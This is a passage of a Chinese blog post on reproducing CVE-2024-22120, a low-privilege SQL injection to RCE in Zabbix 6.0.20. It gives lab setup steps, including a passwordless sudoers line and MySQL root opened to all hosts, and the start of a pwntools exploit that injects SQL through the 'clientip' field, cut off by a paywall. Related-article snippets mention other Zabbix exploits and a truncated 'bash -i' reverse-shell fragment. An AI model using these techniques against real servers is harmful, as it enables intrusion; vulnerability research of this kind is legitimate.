Zabbix低权限SQL注入至RCE+权限绕过

最新推荐文章于 2026-03-12 03:24:54 发布
原创 最新推荐文章于 2026-03-12 03:24:54 发布 · 1k 阅读 · 22
标签
#zabbix #sql #数据库

Zabbix低权限SQL注入至RCE+权限绕过,可惜没找到关于传webshell的好方法,如有大神告知,感激万分!
本文中所有代码以及后续更新都会放在我的github仓库中:

https://github.com/W01fh4cker/CVE-2024-22120-RCE

一、漏洞环境搭建
1.1 下载vmware镜像并设置
源码地址:

https://cdn.zabbix.com/zabbix/sources/stable/6.0/zabbix-6.0.20.tar.gz

Eclipse搭建调试环境的参考文章:

https://mp.weixin.qq.com/s/dBLFvkm6oV_5AMLuwcvuLQ

直接懒人一键搭建:

https://cdn.zabbix.com/zabbix/appliances/stable/6.0/6.0.20/zabbix_appliance-6.0.20-vmx.tar.gz

解压之后,vmware直接打开vmx文件,默认账号密码是root/zabbix。

登录之后执行命令visudo,在底下添加一行:

zabbix ALL=(ALL) NOPASSWD:ALL
在这里插入图片描述
如果后续在web界面执行脚本的时候出错的话可以参考这篇文章继续修改尝试,反正我只加这一行就行了:

https://www.cnblogs.com/gqdw/p/3844881.html

为了方便测试,我们可以本地navicat连接环境的mysql数据库:

mysql -uroot
SET PASSWORD = ‘zabbix’;
use mysql;
select host, user from user;
update user set host = ‘%’ where user =‘root’;
FLUSH PRIVILEGES;
GRANT ALL PRIVILEGES ON . TO ‘root’@‘%’ WITH GRANT OPTION;
FLUSH PRIVILEGES;
exit
/sbin/iptables -I INPUT -p tcp --dport 3306 -j ACCEPT
yum install policycoreutils -y
service iptables save
1.2 漏洞环境设置
然后就是需要一些设置,首先需要添加一个用户,但是默认的User Role是没有HOSTS的查看权限的,所以需要先去开权限:
在这里插入图片描述
在这里插入图片描述
然后至少给一个读的权限,并点击Add:
在这里插入图片描述
在这里插入图片描述
现在开始添加用户:
在这里插入图片描述
组就选我们刚刚设置过的Guests:
在这里插入图片描述
角色选择User Role:
在这里插入图片描述
为什么说这个漏洞鸡肋呢,提交漏洞的作者说了,需要一个低权限用户,并且该用户需要具有Detect operating system的权限,但是这个操作默认的是没有的,只有管理员用户组才有:

在这里插入图片描述
需要手动设置用户组为全部或者Guests:
在这里插入图片描述
在这里插入图片描述
到这里就可以了,然后按照作者给出的复现步骤复现即可:

https://support.zabbix.com/browse/ZBX-24505

二、漏洞复现
2.1 验证漏洞存在并获取管理员session id和session key
作者给出的脚本如下:

https://support.zabbix.com/secure/attachment/236280/zabbix_server_time_based_blind_sqli.py

他说可以延迟获取管理员的session id,但是我本地复现的时候获取的全0:

在这里插入图片描述
登录数据库发现,有多个sessionid,需要加一个limit 1:

在这里插入图片描述

因此我们可以修改代码如下:

import json
import argparse
from pwn import *
from datetime import datetime

def send_message(ip, port, sid, hostid, injection):
zbx_header = “ZBXD\x01”.encode()
message = {
“request”: “command”,
“sid”: sid,
“scriptid”: “3”,
“clientip”: "’ + " + injection + “+ '”,
“hostid”: hostid
}
message_json = json.dumps(message)
message_length = struct.pack(‘<q’, len(message_json))
message = zbx_header + message_l

最低0.47元/天 解锁文章
zabbix-sql, 有用的Zabbix SQL查询.zip
09-18
zabbix-sql, 有用的Zabbix SQL查询 Zabbix SQL repo这个 repo 包含一些Zabbix数据库的有用查询,主要用于清除旧的和/或者孤立的数据。重要说明:使用情况孤立数据旧数据集未使用的数据停止电子邮件泛滥LLD触发器重要说明如果
CVE-2024-22120:Zabbix权限SQL注入RCE+权限绕过
m0_63050933的博客
10-17 3262
然后就是需要一些设置,首先需要添加一个用户,但是默认的。直接iptables -F 清空防火墙,然后保存。网上对于这方面的研究不多,看到一篇灼剑安全团队的。网上也没找到相应的成品代码,那就去翻源码。没有花时间研究其他办法了,因为运行用户是。需要一个权限用户,并且该用户需要具有。,等级太了,所以默认情况下是没权限去。写马,但是他当时遇到的环境是存在。然后至少给一个读的权限,并点击。,但是我本地复现的时候获取的全。为了方便测试,我们可以本地。操作,那感情好啊,直接写出。
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 1707
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 1342
zabbix-latest.php-SQL注入漏洞
zabbix后台RCE
weixin_44508748的博客
11-24 1724
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
php-proxy3 漏洞,Zabbix Server Active Proxy Trappe RCE 漏洞详解(CVE-2017-2824)
weixin_39663970的博客
04-12 663
前言有点相似Zabbix是一种企业监控解决方案,旨在使组织能够监控其网络中各种系统的健康状况和状态,包括:网络服务,服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行,影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻,首先需要能访问到Zabbix Serv...
权限SQL注入RCE+权限绕过
若有战,召必回
11-16 1224
Zabbix权限SQL注入RCE+权限绕过,可惜没找到关于传webshell的好方法,如有大神告知,感激万分!2.3 利用获取到的管理员session id和session key构造zbx_session登录管理界面。他也提到了无法直接echo写马,但是他当时遇到的环境是存在pkexec的,所以有了后续的利用。解压之后,vmware直接打开vmx文件,默认账号密码是root/zabbix。就不花时间仔细调试了,问题出在如下位置,各位自己花点时间,自己琢磨琢磨。
CVE-2024-22120漏洞剖析:从Zabbix权限SQL注入权限提升与RCE实战
最新发布
k0l1m2n3o的博客
03-12 631
本文深入剖析了CVE-2024-22120漏洞,这是一个存在于Zabbix Server审计日志功能中的SQL注入漏洞。攻击者利用权限用户,通过基于时间的盲注技术窃取管理员凭证,最终实现权限提升与远程代码执行(RCE)。文章详细介绍了漏洞原理、环境搭建、利用脚本编写以及从Session窃取到RCE的完整实战过程,并提供了关键的防御加固建议。
HVV 紧急必看|2026 攻防演练高危漏洞清单(必修),重点剖析 CNVD-2026-06411 漏洞_cnvd-2026-02949
十年网络攻防经验 每天分享网络安全知识
03-02 928
Apache RocketMQ NameServer远程命令执行漏洞(CVE-2023-37582)F5 BIG-IP iControl REST认证绕过远程命令执行漏洞(CVE-2022-1388)Apache Spark shell命令注入漏洞(CVE-2022-33891)Apache Superset认证绕过漏洞(CVE-2023-27524)Apache Shiro身份认证绕过漏洞(CVE-2022-32532)Confluence远程代码执行漏洞(CVE-2022-26134)
Zabbix RCE with API JSON-RPC
weixin_33754913的博客
07-29 275
测试脚本: #!/usr/bin/env python # -*- coding: utf-8 -*- # Software Link: http://www.zabbix.com/download.php # Version: 2.2 - 3.0.3 import requests import json import sys def verify(ur...
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Zabbix SQL Injection/RCE – CVE-2013-5743
cnbird's blog
11-11 1430
from:https://www.corelan.be/index.php/2013/10/04/zabbix-sql-injectionrce-cve-2013-5743/ 0x00 背景 该漏洞于2013年9月11号提交,9月23号得到确认,10月2号发布补丁。 新出的0day,可以通过sql注入直接进入后台,并执行系统命令。 该漏洞已有metasploit利用模块,请使用Zabb
Zabbix SQL注入(CVE-2016-10134)
qq_23003811的博客
07-18 763
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入。3、发现注入点profileIdx、profileIdx2。2、sqlmap跑注入点。
rce漏洞和cve漏洞_CNNVD:关于Zabbix漏洞情况的通报_新手白帽子详细教程
2401_84915584的博客
06-24 557
安全客 - 安全资讯平台
Zabbix SAML SSO认证绕过漏洞(CVE-2022-23131)
Blue的博客
03-06 5042
漏洞描述 Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。 影响范围 5.4.0 - 5.4.8 6.0.0alpha1 漏洞复现 1.首先访问Zabbix首页,提取Cookie并进行base64解码: 2.构造poc我们加入username_attribute,将其赋值为Admin(Zabbix内置的管理员名称),并将其base64编码
六款Linux“金钟罩”级防病毒神器,从零基础到精通,收藏这篇就够了!
leah126的博客
03-25 1401
话说,现在超过七成的服务器都在Linux的地盘上跑着,这可成了黑客眼里的“唐僧肉”,谁不想啃一口?虽然Linux没Windows那么容易被“欺负”,但万一中招,那损失可不是闹着玩的。今天,我就来扒一扒六款Linux系统专用的“金钟罩”、“铁布衫”,保你服务器安全系数UP UP UP!
漏洞盒子/Zabbix SQL注入漏洞分析_小白白帽子教程
2401_84915584的博客
06-23 436
zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。
CVE-2024-42327:Zabbix认证后SQL注入漏洞
LAY_BB的博客
05-02 1201
该漏洞存在于 user.get API 端点,任何拥有 API 访问权限的非管理员用户(包括默认的 “用户 ”角色)都可能利用该漏洞。通过操纵特定的 API 调用,攻击者可以注入恶意 SQL 代码,从而获得未经授权的访问权限和控制权。
Zabbix SQL注入漏洞分析
若有战,召必回
01-07 1367
漏洞简介Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。攻击者可以通过API接口,向 user.get API端点发送恶意构造的请求,注入SQL代码,以实现权限提升、数据泄露或系统入侵。影响版本环境搭建参考https://forum.butian.net/share/3056访问https://cdn.zabbix.com/zabbix/appliances/stable/7.0/7.0.0/
zabbix监控配置流程&SQL语句
2301_81694225的博客
04-12 1330
Java架构进阶面试及知识点文档笔记这份文档共498页,其中包括Java集合,并发编程,JVM,Dubbo,Redis,Spring全家桶,MySQL,Kafka等面试解析及知识点整理Java分布式高级面试问题解析文档其中都是包括分布式的面试问题解析,内容有分布式消息队列,Redis缓存,分库分表,微服务架构,分布式高可用,读写分离等等!互联网Java程序员面试必备问题解析及文档学习笔记Java架构进阶视频解析合集一个人可以走的很快,但一群人才能走的更远。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值